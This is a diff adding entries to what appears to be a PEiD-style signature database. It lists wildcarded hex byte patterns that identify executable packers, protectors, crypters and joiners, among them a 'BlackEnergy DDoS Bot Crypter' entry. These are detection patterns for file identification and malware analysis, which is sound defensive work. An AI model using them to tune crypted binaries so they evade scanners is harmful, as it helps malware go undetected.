+signature = BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 60 9C FC BF ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 AA 9D 61 C3 55 8B EC
+ep_only = true
+
+[ASProtect 1.33 - 2.1 Registered -> Alexey Solodovnikov]
+signature = 68 01 ?? ?? ?? E8 01 00 00 00 C3 C3
+ep_only = true
+
+[ASProtect SKE 2.1x (dll) -> Alexey Solodovnikov]
+signature = 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[ASProtect SKE 2.1x (exe) -> Alexey Solodovnikov]
+signature = 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = false
+
+[ASProtect v1.0]
+signature = 60 E8 01 ?? ?? ?? 90 5D 81 ED ?? ?? ?? ?? BB ?? ?? ?? ?? 03 DD 2B 9D
+ep_only = true
+
+[ASProtect v1.1]
+signature = 60 E9 ?? 04 ?? ?? E9 ?? ?? ?? ?? ?? ?? ?? EE
+ep_only = true
+
+[ASProtect v1.1 MTE]
+signature = 60 E9 ?? ?? ?? ?? 91 78 79 79 79 E9
+ep_only = true
+
+[ASProtect v1.1 MTEc]
+signature = 90 60 E8 1B ?? ?? ?? E9 FC
+ep_only = true
+
+[ASProtect v1.2 -> Alexey Solodovnikov (h1)]
+signature = 90 60 E8 1B 00 00 00 E9 FC 8D B5 0F 06 00 00 8B FE B9 97 00 00 00 AD 35 78 56 34 12 AB 49 75 F6 EB 04 5D 45 55 C3 E9 ?? ?? ?? 00
+ep_only = false
+
+[ASProtect v1.23 RC1]
+signature = 68 01 ?? ?? 00 E8 01 00 00 00 C3 C3
+ep_only = true
+
+[ASProtect v1.23 RC4 build 08.07 (dll) -> Alexey Solodovnikov]
+signature = 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[ASProtect v1.23 RC4 build 08.07 (exe) -> Alexey Solodovnikov]
+signature = 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = false
+
+[ASProtect v1.2x]
+signature = 00 00 68 01 ?? ?? ?? C3 AA
+ep_only = true
+
+[ASProtect v1.2x (New Strain)]
+signature = 68 01 ?? ?? ?? E8 01 ?? ?? ?? C3 C3
+ep_only = true
+
+[ASProtect v2.0]
+signature = 68 01 ?? 40 00 E8 01 00 00 00 C3 C3
+ep_only = false
+
+[ASProtect V2.X DLL -> Alexey Solodovnikov]
+signature = 60 E8 03 00 00 00 E9 ?? ?? 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ?? ?? ?? ?? 03 DD
+ep_only = true
+
+[ASProtect v?.? -> If you know this version, post on PEiD board (h2)]
+signature = 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? 00 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 DD 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = false
+
+[ASProtect vx.x]
+signature = 60 ?? ?? ?? ?? ?? 90 5D ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 03 DD
+ep_only = true
+
+[ass - crypter -> by santasdad]
+signature = 55 8B EC 83 C4 EC 53 ?? ?? ?? ?? 89 45 EC B8 98 40 00 10 E8 AC EA FF FF 33 C0 55 68 78 51 00 10 64 ?? ?? ?? ?? 20 6A 0A 68 88 51 00 10 A1 E0 97 00 10 50 E8 D8 EA FF FF 8B D8 53 A1 E0 97 00 10 50 E8 12 EB FF FF 8B F8 53 A1 E0 97 00 10 50 E8 DC EA FF FF 8B D8 53 E8 DC EA FF FF 8B F0 85 F6 74 26 8B D7 4A B8 F0 97 00 10 E8 C9 E7 FF FF B8 F0 97 00 10 E8 B7 E7 FF FF 8B CF 8B D6 E8 EE EA FF FF 53 E8 98 EA FF FF 8D 4D EC BA 9C 51 00 10 A1 F0 97 00 10 E8 22 EB FF FF 8B 55 EC B8 F0 97 00 10 E8 89 E6 FF FF B8 F0 97 00 10 E8 7F E7 FF FF E8 6E EC FF FF 33 C0 5A 59 59 64 89 10 68 7F 51 00 10 8D 45 EC E8 11 E6 FF FF C3 E9 FF DF FF FF EB F0 5F 5E 5B E8 0D E5 FF FF 00 53 45 54 54 49 4E 47 53 00 00 00 00 FF FF FF FF 1C 00 00 00 45 4E 54 45 52 20 59 4F 55 52 20 4F 57 4E 20 50 41 53 53 57 4F 52 44 20 48 45 52 45
+ep_only = true
+
+[AverCryptor 1.0 -> os1r1s]
+signature = 60 E8 00 00 00 00 5D 81 ED 75 17 40 00 8B BD 9C 18 40 00 8B 8D A4 18 40 00 B8 BC 18 40 00 03 C5 80 30 05 83 F9 00 74 71 81 7F 1C AB 00 00 00 75 62 8B 57 0C 03 95 A0 18 40 00 33 C0 51 33 C9 66 B9 FA 00 66 83 F9 00 74 49 8B 57 0C 03 95 A0 18 40 00 8B 85 A8 18 40 00 83 F8 02 75 06 81 C2 00 02 00 00 51 8B 4F 10 83 F8 02 75 06 81 E9 00 02 00 00 57 BF C8 00 00 00 8B F1 E8 27 00 00 00 8B C8 5F B8 BC 18 40 00 03 C5 E8 24 00 00 00 59 49 EB B1 59 83 C7 28 49 EB 8A 8B 85 98 18 40 00 89 44 24 1C 61 FF E0 56 57 4F F7 D7 23 F7 8B C6 5F 5E C3
+ep_only = true
+
+[AverCryptor 1.02 beta -> os1r1s]
+signature = 60 E8 00 00 00 00 5D 81 ED 0C 17 40 00 8B BD 33 18 40 00 8B 8D 3B 18 40 00 B8 51 18 40 00 03 C5 80 30 05 83 F9 00 74 71 81 7F 1C AB 00 00 00 75 62 8B 57 0C 03 95 37 18 40 00 33 C0 51 33 C9 66 B9 F7 00 66 83 F9 00 74 49 8B 57 0C 03 95 37 18 40 00 8B 85 3F 18 40 00 83 F8 02 75 06 81 C2 00 02 00 00 51 8B 4F 10 83 F8 02 75 06 81 E9 00 02 00 00 57 BF C8 00 00 00 8B F1 E8 27 00 00 00 8B C8 5F B8 51 18 40 00 03 C5 E8 24 00 00 00 59 49 EB B1 59 83 C7 28 49 EB 8A 8B 85 2F 18 40 00 89 44 24 1C 61 FF E0 56 57 4F F7 D7 23 F7 8B C6 5F 5E C3
+ep_only = true
+
+[AVPACK v1.20]
+signature = 50 1E 0E 1F 16 07 33 F6 8B FE B9 ?? ?? FC F3 A5 06 BB ?? ?? 53 CB
+ep_only = true
+
+[AZProtect 0001 - by AlexZ aka AZCRC]
+signature = EB 70 FC 60 8C 80 4D 11 00 70 25 81 00 40 0D 91 BB 60 8C 80 4D 11 00 70 21 81 1D 61 0D 81 00 40 CE 60 8C 80 4D 11 00 70 25 81 25 81 25 81 25 81 29 61 41 81 31 61 1D 61 00 40 B7 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 BE 00 ?? ?? 00 BF 00 00 40 00 EB 17 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 00 00 00 00 FF 25 ?? ?? ?? 00 8B C6 03 C7 8B F8 57 55 8B EC 05 7F 00 00 00 50 E8 E5 FF FF FF BA 8C ?? ?? 00 89 02 E9 1A 01 00 00 ?? 00 00 00 47 65 74 4D 6F 64 75 6C 65 46 69 6C 65 4E 61 6D 65 41 00 47 65 74 56 6F 6C 75 6D 65 49 6E 66 6F 72 6D 61 74 69 6F 6E 41 00 4D 65 73 73 61 67 65 42 6F 78 41 00 45 78 69 74 50 72 6F 63 65 73 73 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41
+ep_only = true
+
+[AZProtect 0001 - by AlexZ aka AZCRC]
+signature = FC 33 C9 49 8B D1 33 C0 33 DB AC 32 C1 8A CD 8A EA 8A D6 B6 08 66 D1 EB 66 D1 D8 73 09 66 35 20 83 66 81 F3 B8 ED FE CE 75 EB 33 C8 33 D3 4F 75 D5 F7 D2 F7 D1 8B C2 C1 C0 10 66 8B C1 C3 F0 DA 55 8B EC 53 56 33 C9 33 DB 8B 4D 0C 8B 55 10 8B 75 08 4E 4A 83 FB 08 72 05 33 DB 43 EB 01 43 33 C0 8A 04 31 8A 24 13 2A C4 88 04 31 E2 E6 5E 5B C9 C2 0C
+ep_only = false
+
+[bambam 0.01 -> bedrock]
+signature = 6A 14 E8 9A 05 00 00 8B D8 53 68 ?? ?? ?? ?? E8 6C FD FF FF B9 05 00 00 00 8B F3 BF ?? ?? ?? ?? 53 F3 A5 E8 8D 05 00 00 8B 3D ?? ?? ?? ?? A1 ?? ?? ?? ?? 66 8B 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 2B CF 89 45 E8 89 0D ?? ?? ?? ?? 66 89 55 EC 8B 41 3C 33 D2 03 C1 83 C4 10 66 8B 48 06 66 8B 50 14 81 E1 FF FF 00 00 8D 5C 02 18 8D 41 FF 85 C0
+ep_only = true
+
+[bambam 0.04 -> bedrock]
+signature = BF ?? ?? ?? ?? 83 C9 FF 33 C0 68 ?? ?? ?? ?? F2 AE F7 D1 49 51 68 ?? ?? ?? ?? E8 11 0A 00 00 83 C4 0C 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 BF ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 49 BF ?? ?? ?? ?? 8B D1 68 ?? ?? ?? ?? C1 E9 02 F3 AB 8B CA 83 E1 03 F3 AA BF ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 49 51 68 ?? ?? ?? ?? E8 C0 09 00 00
+ep_only = true
+
+[BamBam v0.01 -> Bedrock]
+signature = 6A 14 E8 9A 05 00 00 8B D8 53 68 FB ?? ?? 00 E8 6C FD FF FF B9 05 00 00 00 8B F3 BF FB ?? ?? 00 53 F3 A5 E8 8D 05 00 00 8B 3D 03 ?? ?? 00 A1 2B ?? ?? 00 66 8B 15 2F ?? ?? 00 B9 80 ?? ?? 00 2B CF 89 45 E8 89 0D 6B ?? ?? 00 66 89 55 EC 8B 41 3C 33 D2 03 C1
+ep_only = false
+
+[beria v0.07 public WIP --> symbiont]
+signature = 83 EC 18 53 8B 1D 00 30 ?? ?? 55 56 57 68 30 07 00 00 33 ED 55 FF D3 8B F0 3B F5 74 0D 89 AE 20 07 00 00 E8 88 0F 00 00 EB 02 33 F6 6A 10 55 89 35 30 40 ?? ?? FF D3 8B F0 3B F5 74 09 89 2E E8 3C FE FF FF EB 02 33 F6 6A 18 55 89 35 D8 43 ?? ?? FF D3 8B F0
+ep_only = true
+
+[BeRo Tiny Pascal -> BeRo]
+signature = E9 ?? ?? ?? ?? 20 43 6F 6D 70 69 6C 65 64 20 62 79 3A 20 42 65 52 6F 54 69 6E 79 50 61 73 63 61 6C 20 2D 20 28 43 29 20 43 6F 70 79 72 69 67 68 74 20 32 30 30 36 2C 20 42 65 6E 6A 61 6D 69 6E 20 27 42 65 52 6F 27 20 52 6F 73 73 65 61 75 78 20
+ep_only = true
+
+[BeRoEXEPacker V1.00 -> BeRo]
+signature = BA ?? ?? ?? ?? 8D B2 ?? ?? ?? ?? 8B 46 ?? 85 C0 74 51 03 C2 8B 7E ?? 8B 1E 85 DB 75 02 8B DF 03 DA 03 FA 52 57 50 FF 15 ?? ?? ?? ?? 5F 5A 85 C0 74 2F 8B C8 8B 03 85 C0 74 22 0F BA F0 1F 72 04 8D 44 ?? ?? 51 52 57 50 51 FF 15 ?? ?? ?? ?? 5F 5A 59 85 C0 74 0B AB 83 C3 04 EB D8 83 C6 14 EB AA 61 C3
+ep_only = false
+
+[BeRoEXEPacker v1.00 DLL [LZBRR] -> BeRo / Farbrausch]
+signature = 83 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 BE ?? ?? ?? ?? BF ?? ?? ?? ?? FC B2 80 33 DB A4 B3 02 E8 ?? ?? ?? ?? 73 F6 33 C9 E8 ?? ?? ?? ?? 73 1C 33 C0 E8 ?? ?? ?? ?? 73 23 B3 02 41 B0 10
+ep_only = true
+
+[BeRoEXEPacker v1.00 DLL [LZBRS] -> BeRo / Farbrausch]
+signature = 83 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 BE ?? ?? ?? ?? BF ?? ?? ?? ?? FC AD 8D 1C 07 B0 80 3B FB 73 3B E8 ?? ?? ?? ?? 72 03 A4 EB F2 E8 ?? ?? ?? ?? 8D 51 FF E8 ?? ?? ?? ?? 56 8B F7 2B F2 F3 A4 5E EB DB 02 C0 75 03 AC 12 C0 C3 33
+ep_only = true
+
+[BeRoEXEPacker v1.00 DLL [LZMA] -> BeRo / Farbrausch]
+signature = 83 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B F9 81 FE ?? ?? ?? ?? 7F 10 AC 47 04 18 2C 02 73 F0 29 3E 03 F1 03 F9 EB E8
+ep_only = true
+
+[BeRoEXEPacker v1.00 [LZBRR] -> BeRo / Farbrausch]
+signature = 60 BE ?? ?? ?? ?? BF ?? ?? ?? ?? FC B2 80 33 DB A4 B3 02 E8 ?? ?? ?? ?? 73 F6 33 C9 E8 ?? ?? ?? ?? 73 1C 33 C0 E8 ?? ?? ?? ?? 73 23 B3 02 41 B0 10
+ep_only = true
+
+[BeRoEXEPacker v1.00 [LZBRS] -> BeRo / Farbrausch]
+signature = 60 BE ?? ?? ?? ?? BF ?? ?? ?? ?? FC AD 8D 1C 07 B0 80 3B FB 73 3B E8 ?? ?? ?? ?? 72 03 A4 EB F2 E8 ?? ?? ?? ?? 8D 51 FF E8 ?? ?? ?? ?? 56 8B F7 2B F2 F3 A4 5E EB DB 02 C0 75 03 AC 12 C0 C3 33
+ep_only = true
+
+[BeRoEXEPacker v1.00 [LZMA] -> BeRo / Farbrausch]
+signature = 60 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? B9 04 00 00 00 8B F9 81 FE ?? ?? ?? ?? 7F 10 AC 47 04 18 2C 02 73 F0 29 3E 03 F1 03 F9 EB E8
+ep_only = true
+
+[BlackEnergy DDoS Bot Crypter]
+signature = 55 ?? ?? 81 EC 1C 01 00 00 53 56 57 6A 04 BE 00 30 00 00 56 FF 35 00 20 11 13 6A 00 E8 ?? 03 00 00 ?? ?? 83 C4 10 ?? FF 89 7D F4 0F
+ep_only = true
+
+[Blade Joiner v1.5]
+signature = 55 8B EC 81 C4 E4 FE FF FF 53 56 57 33 C0 89 45 F0 89 85
+ep_only = true
+
+[BlindSpot 1.0 -> s134k]
+signature = 55 8B EC 81 EC 50 02 00 00 8D 85 B0 FE FF FF 53 56 A3 90 12 40 00 57 8D 85 B0 FD FF FF 68 00 01 00 00 33 F6 50 56 FF 15 24 10 40 00 56 68 80 00 00 00 6A 03 56 56 8D 85 B0 FD FF FF 68 00 00 00 80 50 FF 15 20 10 40 00 56 56 68 00 08 00 00 50 89 45 FC FF 15 1C 10 40 00 8D 45 F8 8B 1D 18 10 40 00 56 50 6A 34 FF 35 90 12 40 00 FF 75 FC FF D3 85 C0 0F 84 7F 01 00 00 39 75 F8 0F 84 76 01 00 00 A1 90 12 40 00 66 8B 40 30 66 3D 01 00 75 14 8D 85 E4 FE FF FF 68 04 01 00 00 50 FF 15 14 10 40 00 EB 2C 66 3D 02 00 75 14 8D 85 E4 FE FF FF 50 68 04 01 00 00 FF 15 10 10 40 00 EB 12 8D 85 E4 FE FF FF 68 04 01 00 00 50 FF 15 0C 10 40 00 8B 3D 08 10 40 00 8D 85 E4 FE FF FF 68 54 10 40 00 50
+ep_only = false
+
+[BobPack v1.00 --> BoB / BobSoft]
+signature = 60 E8 00 00 00 00 8B 0C 24 89 CD 83 E9 06 81 ED ?? ?? ?? ?? E8 3D 00 00 00 89 85 ?? ?? ?? ?? 89 C2 B8 5D 0A 00 00 8D 04 08 E8 E4 00 00 00 8B 70 04 01 D6 E8 76 00 00 00 E8 51 01 00 00 E8 01 01
+ep_only = true
+
+[BobSoft Mini Delphi -> BoB / BobSoft]
+signature = 55 8B EC 83 C4 F0 53 56 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B8
+ep_only = true
+
+[BobSoft Mini Delphi -> BoB / BobSoft]
+signature = 55 8B EC 83 C4 F0 53 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B8 ?? ?? ?? ?? E8
+ep_only = true
+
+[BobSoft Mini Delphi -> BoB / BobSoft]
+signature = 55 8B EC 83 C4 F0 B8 ?? ?? ?? ?? E8
+ep_only = true
+
+[BopCrypt v1.0]
+signature = 60 BD ?? ?? ?? ?? E8 ?? ?? 00 00
+ep_only = true
+
+[CD-Cops II]
+signature = 53 60 BD ?? ?? ?? ?? 8D 45 ?? 8D 5D ?? E8 ?? ?? ?? ?? 8D
+ep_only = true
+
+[CDS SS 1.0 beta1 -> CyberDoom]
+signature = 60 E8 00 00 00 00 5D 81 ED CA 47 40 00 FF 74 24 20 E8 D3 03 00 00 0B C0 0F 84 13 03 00 00 89 85 B8 4E 40 00 66 8C D8 A8 04 74 0C C7 85 8C 4E 40 00 01 00 00 00 EB 12 64 A1 30 00 00 00 0F B6 40 02 0A C0 0F 85 E8 02 00 00 8D 85 F6 4C 40 00 50 FF B5 B8 4E 40 00 E8 FC 03 00 00 0B C0 0F 84 CE 02 00 00 E8 1E 03 00 00 89 85 90 4E 40 00 8D 85 03 4D 40 00 50 FF B5 B8 4E 40 00 E8 D7 03 00 00 0B C0 0F 84 A9 02 00 00 E8 F9 02 00 00 89 85 94 4E 40 00 8D 85 12 4D 40 00 50
+ep_only = true
+
+[CDS SS v1.0 Beta 1 -> CyberDoom / Team-X]
+signature = 60 E8 00 00 00 00 5D 81 ED CA 47 40 00 FF 74 24 20 E8 D3 03 00 00 0B C0 0F 84 13 03 00 00 89 85 B8 4E 40 00 66 8C D8 A8 04 74 0C C7 85 8C 4E 40 00 01 00 00 00 EB 12 64 A1 30 00 00 00 0F B6 40 02 0A C0 0F 85 E8 02 00 00 8D 85 F6 4C 40 00 50 FF B5 B8 4E 40 00 E8 FC 03 00 00 0B C0 0F 84 CE 02 00 00 E8 1E 03 00 00 89 85 90 4E 40 00 8D 85 03 4D 40 00 50 FF B5 B8
+ep_only = true
+
+[Celsius Crypt 2.1 -> Z3r0]
+signature = 55 89 E5 83 EC 08 C7 04 24 01 00 00 00 FF 15 84 92 44 00 E8 C8 FE FF FF 90 8D B4 26 00 00 00 00 55 89 E5 83 EC 08 C7 04 24 02 00 00 00 FF 15 84 92 44 00 E8 A8 FE FF FF 90 8D B4 26 00 00 00 00 55 8B 0D C4 92 44 00 89 E5 5D FF E1 8D 74 26 00 55 8B 0D AC 92 44 00 89 E5 5D FF E1 90 90 90 90 55 89 E5 5D E9 77 C2 00 00 90 90 90 90 90 90 90 55 89 E5 83 EC 28 8B 45 10 89 04 24 E8 3F 14 01 00 48 89 45 FC 8B 45 0C 48 89 45 F4 8D 45 F4 89 44 24 04 8D 45 FC 89 04 24 E8 12 A3 03 00 8B 00 89 45 F8 8B 45 FC 89 45 F0 C6 45 EF 01 C7 45 E8 00 00 00 00 8B 45 E8 3B 45 F8 73 39 80 7D EF 00 74 33 8B 45 F0 89 44 24 04 8B 45 10 89 04 24 E8 1C 1A 01 00 89 C1 8B 45 08 8B 55 E8 01 C2 0F B6 01 3A 02 0F 94 C0 88 45 EF 8D 45 F0 FF 08 8D 45 E8 FF 00 EB BF 83 7D F0 00 74 34 80 7D EF 00 74 2E 8B 45 F0 89 44 24 04 8B 45 10 89 04 24 E8 DD 19 01 00 89 C1 8B 45 08 8B 55 F8 01 C2 0F B6 01 3A 02 0F 94 C0 88 45 EF 8D 45 F0 FF 08 EB C6 C7 44 24 04 00 00 00 00 8B 45 10 89 04 24 E8 AE 19 01 00 89 C1 8B 45 08 8B 55 F8 01 C2 0F B6 01 3A 02 7F 0C 0F B6 45 EF 83 E0 01 88 45 E7 EB 04 C6 45 E7 00 0F B6 45 E7 88 45 EF 0F B6 45 EF C9 C3
+ep_only = true
+
+[Celsius Crypt 2.1 -> Z3r0]
+signature = 55 89 E5 83 EC 28 8B 45 10 89 04 24 E8 3F 14 01 00 48 89 45 FC 8B 45 0C 48 89 45 F4 8D 45 F4 89 44 24 04 8D 45 FC 89 04 24 E8 12 A3 03 00 8B 00 89 45 F8 8B 45 FC 89 45 F0 C6 45 EF 01 C7 45 E8 00 00 00 00 8B 45 E8 3B 45 F8 73 39 80 7D EF 00 74 33 8B 45 F0 89 44 24 04 8B 45 10 89 04 24 E8 1C 1A 01 00 89 C1 8B 45 08 8B 55 E8 01 C2 0F B6 01 3A 02 0F 94 C0 88 45 EF 8D 45 F0 FF 08 8D 45 E8 FF 00 EB BF 83 7D F0 00 74 34 80 7D EF 00 74 2E 8B 45 F0 89 44 24 04 8B 45 10 89 04 24 E8 DD 19 01 00 89 C1 8B 45 08 8B 55 F8 01 C2 0F B6 01 3A 02 0F 94 C0 88 45 EF 8D 45 F0 FF 08 EB C6 C7 44 24 04 00 00 00 00 8B 45 10 89 04 24 E8 AE 19 01 00 89 C1 8B 45 08 8B 55 F8 01 C2 0F B6 01 3A 02 7F 0C 0F B6 45 EF 83 E0 01 88 45 E7 EB 04 C6 45 E7 00 0F B6 45 E7 88 45 EF 0F B6 45 EF C9 C3
+ep_only = false
+
+[CERBERUS v2.0]
+signature = 9C 2B ED 8C ?? ?? 8C ?? ?? FA E4 ?? 88 ?? ?? 16 07 BF ?? ?? 8E DD 9B F5 B9 ?? ?? FC F3 A5
+ep_only = true
+
+[CExe v1.0a]
+signature = 55 8B EC 81 EC 0C 02 ?? ?? 56 BE 04 01 ?? ?? 8D 85 F8 FE FF FF 56 50 6A ?? FF 15 54 10 40 ?? 8A 8D F8 FE FF FF 33 D2 84 C9 8D 85 F8 FE FF FF 74 16
+ep_only = true
+
+[CHECKPRG (c) 1992]
+signature = 33 C0 BE ?? ?? 8B D8 B9 ?? ?? BF ?? ?? BA ?? ?? 47 4A 74
+ep_only = true
+
+[ChinaProtect -> dummy]
+signature = C3 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 30 C3 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 30 C3 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 30 C3 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 30 C3 56 8B ?? ?? ?? 6A 40 68 00 10 00 00 8D ?? ?? 50 6A 00 E8 ?? ?? ?? ?? 89 30 83 C0 04 5E C3 8B 44 ?? ?? 56 8D ?? ?? 68 00 40 00 00 FF 36 56 E8 ?? ?? ?? ?? 68 00 80 00 00 6A 00 56 E8 ?? ?? ?? ?? 5E C3
+ep_only = false
+
+[ChSfx (small) v1.1]
+signature = BA ?? ?? E8 ?? ?? 8B EC 83 EC ?? 8C C8 BB ?? ?? B1 ?? D3 EB 03 C3 8E D8 05 ?? ?? 89
+ep_only = true
+
+[CICompress v1.0]
+signature = 6A 04 68 00 10 00 00 FF 35 9C 14 40 00 6A 00 FF 15 38 10 40 00 A3 FC 10 40 00 97 BE 00 20 40 00 E8 71 00 00 00 3B 05 9C 14 40 00 75 61 6A 00 6A 20 6A 02 6A 00 6A 03 68 00 00 00 C0 68 94 10 40 00 FF 15 2C 10 40 00 A3 F8 10 40 00 6A 00 68 F4 10 40 00 FF 35
+ep_only = true
+
+[CipherWall Self-Extrator/Decryptor (Console) v1.5]
+signature = 90 61 BE 00 10 42 00 8D BE 00 00 FE FF C7 87 C0 20 02 00 0B 6E 5B 9B 57 83 CD FF EB 0E 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4
+ep_only = true
+
+[CipherWall Self-Extrator/Decryptor (GUI) v1.5]
+signature = 90 61 BE 00 10 42 00 8D BE 00 00 FE FF C7 87 C0 20 02 00 F9 89 C7 6A 57 83 CD FF EB 0E 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4
+ep_only = true
+
+[Code Virtualizer 1.3.1.0 -> Oreans Technologies]
+signature = 60 9C FC E8 00 00 00 00 5F 81 EF ?? ?? ?? ?? 8B C7 81 C7 ?? ?? ?? ?? 3B 47 2C 75 02 EB 2E 89 47 2C B9 A7 00 00 00 EB 05 01 44 8F ?? 49 0B C9 75 F7 83 7F 40 00 74 15 8B 77 40 03 F0 EB 09 8B 1E 03 D8 01 03 83 C6 04 83 3E 00 75 F2 8B 74 24 24 8B DE 03 F0 B9 01 00 00 00 33 C0 F0 0F B1 4F 30 75 F7 AC
+ep_only = false
+
+[Code-Lock vx.x]
+signature = 43 4F 44 45 2D 4C 4F 43 4B 2E 4F 43 58 00
+ep_only = true
+
+[CodeCrypt v0.14b]
+signature = E9 C5 02 00 00 EB 02 83 3D 58 EB 02 FF 1D 5B EB 02 0F C7 5F
+ep_only = true
+
+[CodeCrypt v0.15b]
+signature = E9 31 03 00 00 EB 02 83 3D 58 EB 02 FF 1D 5B EB 02 0F C7 5F
+ep_only = true
+
+[CodeCrypt v0.164]
+signature = E9 2E 03 00 00 EB 02 83 3D 58 EB 02 FF 1D 5B EB 02 0F C7 5F EB 03 FF 1D 34
+ep_only = true
+
+[CodeCrypt v0.16b - v0.163b]
+signature = E9 2E 03 00 00 EB 02 83 3D 58 EB 02 FF 1D 5B EB 02 0F C7 5F
+ep_only = true
+
+[codeCrypter 0.31]
+signature = 50 58 53 5B 90 BB ?? ?? 40 00 FF E3 90 CC CC CC 55 8B EC 5D C3 CC CC CC CC CC CC CC CC CC CC CC
+ep_only = false
+
+[codeCrypter 0.31 -> Tibbar]
+signature = 50 58 53 5B 90 BB ?? ?? ?? 00 FF E3 90 CC CC CC 55 8B EC 5D C3 CC CC CC CC CC CC CC CC CC CC CC
+ep_only = true
+
+[COP v1.0 (c) 1988]
+signature = BF ?? ?? BE ?? ?? B9 ?? ?? AC 32 ?? ?? ?? AA E2 ?? 8B ?? ?? ?? EB ?? 90
+ep_only = true
+
+[Copy Protector v2.0]
+signature = 2E A2 ?? ?? 53 51 52 1E 06 B4 ?? 1E 0E 1F BA ?? ?? CD 21 1F
+ep_only = true
+
+[CopyControl v3.03]
+signature = CC 90 90 EB 0B 01 50 51 52 53 54 61 33 61 2D 35 CA D1 07 52 D1 A1 3C
+ep_only = true
+
+[CopyMinder -> Microcosm.Ltd]
+signature = 83 25 ?? ?? ?? ?? EF 6A 00 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? CC FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25 ?? ?? ?? ?? FF 25
+ep_only = true
+
+[CPAV]
+signature = E8 ?? ?? 4D 5A B1 01 93 01 00 00 02
+ep_only = true
+
+[CrackStop v1.01 (c) Stefan Esser 1997]
+signature = B4 48 BB FF FF B9 EB 27 8B EC CD 21 FA FC
+ep_only = true
+
+[CreateInstall Stub vx.x]
